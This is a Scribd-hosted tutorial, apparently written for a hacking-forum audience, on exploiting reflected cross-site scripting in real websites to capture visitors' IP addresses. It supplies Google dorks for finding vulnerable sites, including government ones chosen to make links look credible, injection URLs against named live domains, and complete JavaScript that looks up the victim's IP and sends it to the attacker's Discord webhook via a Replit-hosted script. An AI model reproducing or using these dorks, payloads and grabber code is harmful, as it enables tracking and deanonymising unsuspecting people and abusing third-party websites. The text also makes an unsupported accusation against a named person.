Scribd
Upload
19 views

XSS_IP_Grabber_Method

The document outlines a method for exploiting non-persistent XSS vulnerabilities to capture IP addresses by injecting malicious JavaScript into vulnerable websites. It provides step-by-step instructions on finding such sites, injecting code, and setting up an IP grabber script that sends the collected data to a Discord webhook. Additionally, it includes examples and tips for crafting URLs to execute the attack discreetly.

Uploaded by

georgemanny56
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
19 views

XSS_IP_Grabber_Method

The document outlines a method for exploiting non-persistent XSS vulnerabilities to capture IP addresses by injecting malicious JavaScript into vulnerable websites. It provides step-by-step instructions on finding such sites, injecting code, and setting up an IP grabber script that sends the collected data to a Discord webhook. Additionally, it includes examples and tips for crafting URLs to execute the attack discreetly.

Uploaded by

georgemanny56
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 5

Using non-persistent XSS vulnerabilities to grab IP addresses

By using a non-persistent XSS vulnerability on a website, you can embed


IP-grabbing Javascript in a URL and share it with the target. The IP address is sent
to a Discord webhook.

Step 1: Finding a site


Use the following Google dork to find websites that display an error message when
an invalid SQL query is entered:

“Web Design By East Technologies”

inurl:".php?id=" "You have an error in your SQL syntax"

Find sites that display the specific text in the URL that caused the error.

The website “http://www.rxydpq.com/news_show.php?id=66%20target=”, for


example, is missing the parameter for “target”, resulting in “target=” being
displayed on the page. If you want to skip this step, use the examples in step two.

Step 2: Inject Javascript into page


By modifying the text in the URL that caused the error, we can inject whatever text
we want into the error message, including HTML and Javascript. Examples of this
are shown below:
HTML content injection examples:
http://www.rxydpq.com/news_show.php?id=66%20%20target=<marquee><h1>Br
eachForums is da best!</h1></marquee>

https://www.mmftimberhub.com/work_detail.php?id=<marquee><h1>BreachForu
ms is da best!</h1></marquee>

Javascript injection examples:


http://www.rxydpq.com/news_show.php?id=66%20target=
<script>alert(String.fromCharCode(35,70,114,101,101,80,111,109))</script>

https://www.colegiosguatemala.com/blog/visualizar.php?id=71?clave=<script>aler
t(String.fromCharCode(35, 70, 114, 101, 101, 80, 111, 109));</script>
As you can see in the third and fourth examples, I had to use String.fromCharCode
to encode quotation marks and hashtags.

This was written before it became known Pompompurin was a child groomer. I’m
too lazy to change the examples. Also, most of these sites are no longer up. You’ll
have to find your own.

Step 3: Setting up the IP grabber script


Now that you have a site vulnerable to cross-site scripting, you need to make a
useful payload. In this case, we want the payload to get the IP addresses of visitors
and send that information to a webhook.

Having the entire script in the URL would look slightly suspicious. It’s better to
have the script stored on a Repl (https://replit.com), and use <script> src to load it
from the site (You can also send a Repl to a person directly to log their IP address.
If the person knows what Replit is, however, this might not be the best choice.).

Make a new HTML, CSS, JS Repl. The length of the Repl’s name will affect the
length of the crafted URL, so make it as short as possible.

Once you have made the new Repl, go to script.js and copy and paste the code
below (make sure to change the webhook!):
function getIP(json) {
const request = new XMLHttpRequest();
request.open("POST", "YOUR_WEBHOOK_HERE");

request.setRequestHeader('Content-type', 'application/json');

const params = {
username: "IP Grabber",
avatar_url: "",
content: json.ip
}

request.send(JSON.stringify(params));
}

const script = document.createElement("script");


script.src = "https://api.ipify.org?format=jsonp&callback=getIP";
document.getElementsByTagName("body")[0].appendChild(script);

Your screen should look something like this:


Open the webview of the Repl in a new tab and add “/script.js” to the URL, and
then copy and paste the entire URL in between “<script> src=” and “>”. The URL
should be in quotes (e.g. <script src="https://a.exampleusername.repl.co/script.js"
></script>).

The crafted URL is finished. Whoever clicks on it will have your Javascript run on
their computer.

Other things to try


To find vulnerable government sites you could use, use this dork.

inurl:".php?id=" "sql syntax" inurl:"gov"

The inurl:”gov” parameter searches for only government websites. This may add
credibility to the final link.

Tutorial written by Qwertz


Discord: time.pilot

You might also like